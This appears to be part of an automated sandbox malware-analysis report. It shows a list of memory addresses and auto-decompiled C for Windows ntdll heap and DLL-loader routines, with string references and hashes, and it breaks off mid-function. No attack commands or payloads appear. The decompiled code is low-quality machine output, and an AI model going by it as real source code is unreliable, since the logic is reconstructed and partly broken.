                                                                                                                0x04413ed5
                                                                                                                0x04413ed8
                                                                                                                0x04413ed8
                                                                                                                0x04413edd
                                                                                                                0x044682b3
                                                                                                                0x044682b6
                                                                                                                0x00000000
                                                                                                                0x04413ee3
                                                                                                                0x04413ee8
                                                                                                                0x04413eed
                                                                                                                0x04413ef0
                                                                                                                0x04413ef3
                                                                                                                0x04413f02
                                                                                                                0x04413f05
                                                                                                                0x04413f08
                                                                                                                0x044682c0
                                                                                                                0x044682c3
                                                                                                                0x044682c5
                                                                                                                0x044682c8
                                                                                                                0x044682d0
                                                                                                                0x044682e4
                                                                                                                0x044682e6
                                                                                                                0x044682e6
                                                                                                                0x044682ed
                                                                                                                0x044682f4
                                                                                                                0x044682f7
                                                                                                                0x044682f8
                                                                                                                0x044682fc
                                                                                                                0x044682ff
                                                                                                                0x044682ff
                                                                                                                0x04413f0e
                                                                                                                0x04413f11
                                                                                                                0x04413f16
                                                                                                                0x04413f1d
                                                                                                                0x04413f31
                                                                                                                0x04468307
                                                                                                                0x04468307
                                                                                                                0x04413f31
                                                                                                                0x04413f39
                                                                                                                0x04413f48
                                                                                                                0x04413f4d
                                                                                                                0x04413f50
                                                                                                                0x04413f50
                                                                                                                0x04413f53
                                                                                                                0x04413f58
                                                                                                                0x04413f65
                                                                                                                0x04413f65
                                                                                                                0x04413f6a
                                                                                                                0x00000000
                                                                                                                0x04413f6a
                                                                                                                0x04413edd
                                                                                                                0x04413dda
                                                                                                                0x04413ddd
                                                                                                                0x04413de0
                                                                                                                0x04413de5
                                                                                                                0x04468245
                                                                                                                0x04413deb
                                                                                                                0x04413df7
                                                                                                                0x04413dfc
                                                                                                                0x04413dfe
                                                                                                                0x04413e01
                                                                                                                0x04413e01
                                                                                                                0x04413e06
                                                                                                                0x0446824d
                                                                                                                0x0446824f
                                                                                                                0x04468254
                                                                                                                0x00000000
                                                                                                                0x04413e0c
                                                                                                                0x04413e11
                                                                                                                0x04413e16
                                                                                                                0x04413e19
                                                                                                                0x04413e29
                                                                                                                0x04413e2c
                                                                                                                0x04413e2f
                                                                                                                0x0446825c
                                                                                                                0x0446825f
                                                                                                                0x04468261
                                                                                                                0x04468264
                                                                                                                0x0446826c
                                                                                                                0x04468280
                                                                                                                0x04468282
                                                                                                                0x04468282
                                                                                                                0x04468289
                                                                                                                0x04468290
                                                                                                                0x04468293
                                                                                                                0x04468294
                                                                                                                0x04468298
                                                                                                                0x0446829b
                                                                                                                0x0446829b
                                                                                                                0x04413e35
                                                                                                                0x04413e38
                                                                                                                0x04413e3d
                                                                                                                0x04413e44
                                                                                                                0x04413e58
                                                                                                                0x044682a3
                                                                                                                0x044682a3
                                                                                                                0x04413e58
                                                                                                                0x04413e60
                                                                                                                0x04413e6f
                                                                                                                0x04413e74
                                                                                                                0x04413e77
                                                                                                                0x04413e77
                                                                                                                0x04413e7a
                                                                                                                0x04413e7f
                                                                                                                0x04413e8c
                                                                                                                0x04413e8c
                                                                                                                0x04413e91
                                                                                                                0x00000000
                                                                                                                0x04413e91

                                                                                                                Strings
                                                                                                                • Kernel-MUI-Language-Disallowed, xrefs: 04413E97
                                                                                                                • Kernel-MUI-Language-SKU, xrefs: 04413F70
                                                                                                                • Kernel-MUI-Number-Allowed, xrefs: 04413D8C
                                                                                                                • WindowsExcludedProcs, xrefs: 04413D6F
                                                                                                                • Kernel-MUI-Language-Allowed, xrefs: 04413DC0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                • API String ID: 0-258546922
                                                                                                                • Opcode ID: 672b9369493548dc650d3ef8703396eb6d6217065ca14148af78dc721a4b9b3c
                                                                                                                • Instruction ID: 7a7adcae2dcabbe433363e6f646082b3df85669df46655209e18c3549bc008f0
                                                                                                                • Opcode Fuzzy Hash: 672b9369493548dc650d3ef8703396eb6d6217065ca14148af78dc721a4b9b3c
                                                                                                                • Instruction Fuzzy Hash: 12F12B72D01618EBEF11DF99C980AAFBBB9FF48750F14005BE905A7261E774AE01CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 29%
                                                                                                                			E044040E1(void* __edx) {
                                                                                                                				void* _t19;
                                                                                                                				void* _t29;
                                                                                                                
                                                                                                                				_t28 = _t19;
                                                                                                                				_t29 = __edx;
                                                                                                                				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
                                                                                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                                						_push("HEAP: ");
                                                                                                                						E0440B150();
                                                                                                                					} else {
                                                                                                                						E0440B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                					}
                                                                                                                					E0440B150("Invalid heap signature for heap at %p", _t28);
                                                                                                                					if(_t29 != 0) {
                                                                                                                						E0440B150(", passed to %s", _t29);
                                                                                                                					}
                                                                                                                					_push("\n");
                                                                                                                					E0440B150();
                                                                                                                					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                                                                						 *0x44f6378 = 1;
                                                                                                                						asm("int3");
                                                                                                                						 *0x44f6378 = 0;
                                                                                                                					}
                                                                                                                					return 0;
                                                                                                                				}
                                                                                                                				return 1;
                                                                                                                			}






                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                                                                                                • API String ID: 0-188067316
                                                                                                                • Opcode ID: 763119c4094fff784cac732d07c80d437937258512bbb2d2eda5bbad41321bf3
                                                                                                                • Instruction ID: 47e52189e31d10805306573e478e6c721fbf0f0373ed10e6c70e5f0f54575ff4
                                                                                                                • Opcode Fuzzy Hash: 763119c4094fff784cac732d07c80d437937258512bbb2d2eda5bbad41321bf3
                                                                                                                • Instruction Fuzzy Hash: 2001F5322052909FEA25A7A6A40FB6277A4DB00B75F19C02BF4055B7C28AB4B851D525
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 44%
                                                                                                                			E04438E00(void* __ecx) {
                                                                                                                				signed int _v8;
                                                                                                                				char _v12;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				intOrPtr* _t32;
                                                                                                                				intOrPtr _t35;
                                                                                                                				intOrPtr _t43;
                                                                                                                				void* _t46;
                                                                                                                				intOrPtr _t47;
                                                                                                                				void* _t48;
                                                                                                                				signed int _t49;
                                                                                                                				void* _t50;
                                                                                                                				intOrPtr* _t51;
                                                                                                                				signed int _t52;
                                                                                                                				void* _t53;
                                                                                                                				intOrPtr _t55;
                                                                                                                
                                                                                                                				_v8 =  *0x44fd360 ^ _t52;
                                                                                                                				_t49 = 0;
                                                                                                                				_t48 = __ecx;
                                                                                                                				_t55 =  *0x44f8464; // 0x74720110
                                                                                                                				if(_t55 == 0) {
                                                                                                                					L9:
                                                                                                                					if( !_t49 >= 0) {
                                                                                                                						if(( *0x44f5780 & 0x00000003) != 0) {
                                                                                                                							E04485510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                                                                                                						}
                                                                                                                						if(( *0x44f5780 & 0x00000010) != 0) {
                                                                                                                							asm("int3");
                                                                                                                						}
                                                                                                                					}
                                                                                                                					return E0444B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                                                                                                				}
                                                                                                                				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                                                                                                				_t43 =  *0x44f7984; // 0x352ad0
                                                                                                                				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                                                                                                					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                                                                                                					if(_t48 == _t43) {
                                                                                                                						_t50 = 0x5c;
                                                                                                                						if( *_t32 == _t50) {
                                                                                                                							_t46 = 0x3f;
                                                                                                                							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                                                                                                								_t32 = _t32 + 8;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t51 =  *0x44f8464; // 0x74720110
                                                                                                                					 *0x44fb1e0(_t47, _t32,  &_v12);
                                                                                                                					_t49 =  *_t51();
                                                                                                                					if(_t49 >= 0) {
                                                                                                                						L8:
                                                                                                                						_t35 = _v12;
                                                                                                                						if(_t35 != 0) {
                                                                                                                							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                                                                                                								E04439B10( *((intOrPtr*)(_t48 + 0x48)));
                                                                                                                								_t35 = _v12;
                                                                                                                							}
                                                                                                                							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                                                                                                						}
                                                                                                                						goto L9;
                                                                                                                					}
                                                                                                                					if(_t49 != 0xc000008a) {
                                                                                                                						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                                                                                                							if(_t49 != 0xc00000bb) {
                                                                                                                								goto L8;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					if(( *0x44f5780 & 0x00000005) != 0) {
                                                                                                                						_push(_t49);
                                                                                                                						E04485510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                                                                                                						_t53 = _t53 + 0x1c;
                                                                                                                					}
                                                                                                                					_t49 = 0;
                                                                                                                					goto L8;
                                                                                                                				} else {
                                                                                                                					goto L9;
                                                                                                                				}
                                                                                                                			}





















                                                                                                                Strings
                                                                                                                • minkernel\ntdll\ldrsnap.c, xrefs: 0447933B, 04479367
                                                                                                                • Querying the active activation context failed with status 0x%08lx, xrefs: 04479357
                                                                                                                • LdrpFindDllActivationContext, xrefs: 04479331, 0447935D
                                                                                                                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0447932A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                • API String ID: 0-3779518884
                                                                                                                • Opcode ID: 8ac8d86f4e60c09a02101126f92948b513d6793a4779974174c8fffe0c7072f5
                                                                                                                • Instruction ID: 96b683d252408b9ef6eb5fd7b1fd70f9dd2f645bcc9f01173a817cc3c9777174
                                                                                                                • Opcode Fuzzy Hash: 8ac8d86f4e60c09a02101126f92948b513d6793a4779974174c8fffe0c7072f5
                                                                                                                • Instruction Fuzzy Hash: 3F41D332A00315AFFF35BA19884BA77F6F5EB08B46F05416BF814D7291EB74BC808681
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 83%
                                                                                                                			E04418794(void* __ecx) {
                                                                                                                				signed int _v0;
                                                                                                                				char _v8;
                                                                                                                				signed int _v12;
                                                                                                                				void* _v16;
                                                                                                                				signed int _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v40;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				intOrPtr* _t77;
                                                                                                                				signed int _t80;
                                                                                                                				signed char _t81;
                                                                                                                				signed int _t87;
                                                                                                                				signed int _t91;
                                                                                                                				void* _t92;
                                                                                                                				void* _t94;
                                                                                                                				signed int _t95;
                                                                                                                				signed int _t103;
                                                                                                                				signed int _t105;
                                                                                                                				signed int _t110;
                                                                                                                				signed int _t118;
                                                                                                                				intOrPtr* _t121;
                                                                                                                				intOrPtr _t122;
                                                                                                                				signed int _t125;
                                                                                                                				signed int _t129;
                                                                                                                				signed int _t131;
                                                                                                                				signed int _t134;
                                                                                                                				signed int _t136;
                                                                                                                				signed int _t143;
                                                                                                                				signed int* _t147;
                                                                                                                				signed int _t151;
                                                                                                                				void* _t153;
                                                                                                                				signed int* _t157;
                                                                                                                				signed int _t159;
                                                                                                                				signed int _t161;
                                                                                                                				signed int _t166;
                                                                                                                				signed int _t168;
                                                                                                                
                                                                                                                				_push(__ecx);
                                                                                                                				_t153 = __ecx;
                                                                                                                				_t159 = 0;
                                                                                                                				_t121 = __ecx + 0x3c;
                                                                                                                				if( *_t121 == 0) {
                                                                                                                					L2:
                                                                                                                					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                                                                                                					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                                                                                                						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                                                                                                						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                                                                                                						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                                                                                                							L6:
                                                                                                                							if(E0441934A() != 0) {
                                                                                                                								_t159 = E0448A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                                                                                                								__eflags = _t159;
                                                                                                                								if(_t159 < 0) {
                                                                                                                									_t81 =  *0x44f5780; // 0x0
                                                                                                                									__eflags = _t81 & 0x00000003;
                                                                                                                									if((_t81 & 0x00000003) != 0) {
                                                                                                                										_push(_t159);
                                                                                                                										E04485510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                                                                                                										_t81 =  *0x44f5780; // 0x0
                                                                                                                									}
                                                                                                                									__eflags = _t81 & 0x00000010;
                                                                                                                									if((_t81 & 0x00000010) != 0) {
                                                                                                                										asm("int3");
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							_t159 = E0441849B(0, _t122, _t153, _t159, _t180);
                                                                                                                							if(_t159 >= 0) {
                                                                                                                								goto L6;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_t80 = _t159;
                                                                                                                						goto L8;
                                                                                                                					} else {
                                                                                                                						_t125 = 0x13;
                                                                                                                						asm("int 0x29");
                                                                                                                						_push(0);
                                                                                                                						_push(_t159);
                                                                                                                						_t161 = _t125;
                                                                                                                						_t87 =  *( *[fs:0x30] + 0x1e8);
                                                                                                                						_t143 = 0;
                                                                                                                						_v40 = _t161;
                                                                                                                						_t118 = 0;
                                                                                                                						_push(_t153);
                                                                                                                						__eflags = _t87;
                                                                                                                						if(_t87 != 0) {
                                                                                                                							_t118 = _t87 + 0x5d8;
                                                                                                                							__eflags = _t118;
                                                                                                                							if(_t118 == 0) {
                                                                                                                								L46:
                                                                                                                								_t118 = 0;
                                                                                                                							} else {
                                                                                                                								__eflags =  *(_t118 + 0x30);
                                                                                                                								if( *(_t118 + 0x30) == 0) {
                                                                                                                									goto L46;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_v32 = 0;
                                                                                                                						_v28 = 0;
                                                                                                                						_v16 = 0;
                                                                                                                						_v20 = 0;
                                                                                                                						_v12 = 0;
                                                                                                                						__eflags = _t118;
                                                                                                                						if(_t118 != 0) {
                                                                                                                							__eflags = _t161;
                                                                                                                							if(_t161 != 0) {
                                                                                                                								__eflags =  *(_t118 + 8);
                                                                                                                								if( *(_t118 + 8) == 0) {
                                                                                                                									L22:
                                                                                                                									_t143 = 1;
                                                                                                                									__eflags = 1;
                                                                                                                								} else {
                                                                                                                									_t19 = _t118 + 0x40; // 0x40
                                                                                                                									_t156 = _t19;
                                                                                                                									E04418999(_t19,  &_v16);
                                                                                                                									__eflags = _v0;
                                                                                                                									if(_v0 != 0) {
                                                                                                                										__eflags = _v0 - 1;
                                                                                                                										if(_v0 != 1) {
                                                                                                                											goto L22;
                                                                                                                										} else {
                                                                                                                											_t128 =  *(_t161 + 0x64);
                                                                                                                											__eflags =  *(_t161 + 0x64);
                                                                                                                											if( *(_t161 + 0x64) == 0) {
                                                                                                                												goto L22;
                                                                                                                											} else {
                                                                                                                												E04418999(_t128,  &_v12);
                                                                                                                												_t147 = _v12;
                                                                                                                												_t91 = 0;
                                                                                                                												__eflags = 0;
                                                                                                                												_t129 =  *_t147;
                                                                                                                												while(1) {
                                                                                                                													__eflags =  *((intOrPtr*)(0x44f5c60 + _t91 * 8)) - _t129;
                                                                                                                													if( *((intOrPtr*)(0x44f5c60 + _t91 * 8)) == _t129) {
                                                                                                                														break;
                                                                                                                													}
                                                                                                                													_t91 = _t91 + 1;
                                                                                                                													__eflags = _t91 - 5;
                                                                                                                													if(_t91 < 5) {
                                                                                                                														continue;
                                                                                                                													} else {
                                                                                                                														_t131 = 0;
                                                                                                                														__eflags = 0;
                                                                                                                													}
                                                                                                                													L37:
                                                                                                                													__eflags = _t131;
                                                                                                                													if(_t131 != 0) {
                                                                                                                														goto L22;
                                                                                                                													} else {
                                                                                                                														__eflags = _v16 - _t147;
                                                                                                                														if(_v16 != _t147) {
                                                                                                                															goto L22;
                                                                                                                														} else {
                                                                                                                															E04422280(_t92, 0x44f86cc);
                                                                                                                															_t94 = E044D9DFB( &_v20);
                                                                                                                															__eflags = _t94 - 1;
                                                                                                                															if(_t94 != 1) {
                                                                                                                															}
                                                                                                                															asm("movsd");
                                                                                                                															asm("movsd");
                                                                                                                															asm("movsd");
                                                                                                                															asm("movsd");
                                                                                                                															 *_t118 =  *_t118 + 1;
                                                                                                                															asm("adc dword [ebx+0x4], 0x0");
                                                                                                                															_t95 = E044361A0( &_v32);
                                                                                                                															__eflags = _t95;
                                                                                                                															if(_t95 != 0) {
                                                                                                                																__eflags = _v32 | _v28;
                                                                                                                																if((_v32 | _v28) != 0) {
                                                                                                                																	_t71 = _t118 + 0x40; // 0x3f
                                                                                                                																	_t134 = _t71;
                                                                                                                																	goto L55;
                                                                                                                																}
                                                                                                                															}
                                                                                                                															goto L30;
                                                                                                                														}
                                                                                                                													}
                                                                                                                													goto L56;
                                                                                                                												}
                                                                                                                												_t92 = 0x44f5c64 + _t91 * 8;
                                                                                                                												asm("lock xadd [eax], ecx");
                                                                                                                												_t131 = (_t129 | 0xffffffff) - 1;
                                                                                                                												goto L37;
                                                                                                                											}
                                                                                                                										}
                                                                                                                										goto L56;
                                                                                                                									} else {
                                                                                                                										_t143 = E04418A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                                                                                                										__eflags = _t143;
                                                                                                                										if(_t143 != 0) {
                                                                                                                											_t157 = _v12;
                                                                                                                											_t103 = 0;
                                                                                                                											__eflags = 0;
                                                                                                                											_t136 =  &(_t157[1]);
                                                                                                                											 *(_t161 + 0x64) = _t136;
                                                                                                                											_t151 =  *_t157;
                                                                                                                											_v20 = _t136;
                                                                                                                											while(1) {
                                                                                                                												__eflags =  *((intOrPtr*)(0x44f5c60 + _t103 * 8)) - _t151;
                                                                                                                												if( *((intOrPtr*)(0x44f5c60 + _t103 * 8)) == _t151) {
                                                                                                                													break;
                                                                                                                												}
                                                                                                                												_t103 = _t103 + 1;
                                                                                                                												__eflags = _t103 - 5;
                                                                                                                												if(_t103 < 5) {
                                                                                                                													continue;
                                                                                                                												}
                                                                                                                												L21:
                                                                                                                												_t105 = E0444F380(_t136, 0x43e1184, 0x10);
                                                                                                                												__eflags = _t105;
                                                                                                                												if(_t105 != 0) {
                                                                                                                													__eflags =  *_t157 -  *_v16;
                                                                                                                													if( *_t157 >=  *_v16) {
                                                                                                                														goto L22;
                                                                                                                													} else {
                                                                                                                														asm("cdq");
                                                                                                                														_t166 = _t157[5] & 0x0000ffff;
                                                                                                                														_t108 = _t157[5] & 0x0000ffff;
                                                                                                                														asm("cdq");
                                                                                                                														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                                                                                                														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                                                                                                														if(__eflags > 0) {
                                                                                                                															L29:
                                                                                                                															E04422280(_t108, 0x44f86cc);
                                                                                                                															 *_t118 =  *_t118 + 1;
                                                                                                                															_t42 = _t118 + 0x40; // 0x3f
                                                                                                                															_t156 = _t42;
                                                                                                                															asm("adc dword [ebx+0x4], 0x0");
                                                                                                                															asm("movsd");
                                                                                                                															asm("movsd");
                                                                                                                															asm("movsd");
                                                                                                                															asm("movsd");
                                                                                                                															_t110 = E044361A0( &_v32);
                                                                                                                															__eflags = _t110;
                                                                                                                															if(_t110 != 0) {
                                                                                                                																__eflags = _v32 | _v28;
                                                                                                                																if((_v32 | _v28) != 0) {
                                                                                                                																	_t134 = _v20;
                                                                                                                																	L55:
                                                                                                                																	E044D9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                                                                                                																}
                                                                                                                															}
                                                                                                                															L30:
                                                                                                                															 *_t118 =  *_t118 + 1;
                                                                                                                															asm("adc dword [ebx+0x4], 0x0");
                                                                                                                															E0441FFB0(_t118, _t156, 0x44f86cc);
                                                                                                                															goto L22;
                                                                                                                														} else {
                                                                                                                															if(__eflags < 0) {
                                                                                                                																goto L22;
                                                                                                                															} else {
                                                                                                                																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                                                                                                																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                                                                                                																	goto L22;
                                                                                                                																} else {
                                                                                                                																	goto L29;
                                                                                                                																}
                                                                                                                															}
                                                                                                                														}
                                                                                                                													}
                                                                                                                													goto L56;
                                                                                                                												}
                                                                                                                												goto L22;
                                                                                                                											}
                                                                                                                											asm("lock inc dword [eax]");
                                                                                                                											goto L21;
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						return _t143;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_push( &_v8);
                                                                                                                					_push( *((intOrPtr*)(__ecx + 0x50)));
                                                                                                                					_push(__ecx + 0x40);
                                                                                                                					_push(_t121);
                                                                                                                					_push(0xffffffff);
                                                                                                                					_t80 = E04449A00();
                                                                                                                					_t159 = _t80;
                                                                                                                					if(_t159 < 0) {
                                                                                                                						L8:
                                                                                                                						return _t80;
                                                                                                                					} else {
                                                                                                                						goto L2;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				L56:
                                                                                                                			}












































                                                                                                                0x044187c1
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 04469C18
                                                                                                                • minkernel\ntdll\ldrsnap.c, xrefs: 04469C28
                                                                                                                • LdrpDoPostSnapWork, xrefs: 04469C1E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                                                                • API String ID: 0-1948996284
                                                                                                                • Opcode ID: 4e19514f8123ca22f89bdfd9bf44f10db24aa5b1412b163d2487314cb48bc5fd
                                                                                                                • Instruction ID: 363be1882b6d4368410341b56706d8b3ea8dd1cb4e0765f40d868cdbc3d3779d
                                                                                                                • Opcode Fuzzy Hash: 4e19514f8123ca22f89bdfd9bf44f10db24aa5b1412b163d2487314cb48bc5fd
                                                                                                                • Instruction Fuzzy Hash: 7F910571A00616EFEF28EF5AC881ABA73B5FF84354B14416BD905AB261E770FD01CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 98%
                                                                                                                			E04417E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                                                				char _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				char _v24;
                                                                                                                				signed int _t73;
                                                                                                                				void* _t77;
                                                                                                                				char* _t82;
                                                                                                                				char* _t87;
                                                                                                                				signed char* _t97;
                                                                                                                				signed char _t102;
                                                                                                                				intOrPtr _t107;
                                                                                                                				signed char* _t108;
                                                                                                                				intOrPtr _t112;
                                                                                                                				intOrPtr _t124;
                                                                                                                				intOrPtr _t125;
                                                                                                                				intOrPtr _t126;
                                                                                                                
                                                                                                                				_t107 = __edx;
                                                                                                                				_v12 = __ecx;
                                                                                                                				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                                                                                                				_t124 = 0;
                                                                                                                				_v20 = __edx;
                                                                                                                				if(E0441CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                                                                                                					_t112 = _v8;
                                                                                                                				} else {
                                                                                                                					_t112 = 0;
                                                                                                                					_v8 = 0;
                                                                                                                				}
                                                                                                                				if(_t112 != 0) {
                                                                                                                					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                                                                                                						_t124 = 0xc000007b;
                                                                                                                						goto L8;
                                                                                                                					}
                                                                                                                					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                                                                                                					 *(_t125 + 0x34) = _t73;
                                                                                                                					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                                                                                                						goto L3;
                                                                                                                					}
                                                                                                                					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                                                                                                					_t124 = E0440C9A4( *((intOrPtr*)(_t125 + 0x18)));
                                                                                                                					if(_t124 < 0) {
                                                                                                                						goto L8;
                                                                                                                					} else {
                                                                                                                						goto L3;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					L3:
                                                                                                                					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                                                                                                						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                                                                                                						L8:
                                                                                                                						return _t124;
                                                                                                                					}
                                                                                                                					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                                                                                                						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                                                                                                							goto L5;
                                                                                                                						}
                                                                                                                						_t102 =  *0x44f5780; // 0x0
                                                                                                                						if((_t102 & 0x00000003) != 0) {
                                                                                                                							E04485510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                                                                                                							_t102 =  *0x44f5780; // 0x0
                                                                                                                						}
                                                                                                                						if((_t102 & 0x00000010) != 0) {
                                                                                                                							asm("int3");
                                                                                                                						}
                                                                                                                						_t124 = 0xc0000428;
                                                                                                                						goto L8;
                                                                                                                					}
                                                                                                                					L5:
                                                                                                                					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                                                                                                						goto L8;
                                                                                                                					}
                                                                                                                					_t77 = _a4 - 0x40000003;
                                                                                                                					if(_t77 == 0 || _t77 == 0x33) {
                                                                                                                						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                                                                                                						if(E04427D50() != 0) {
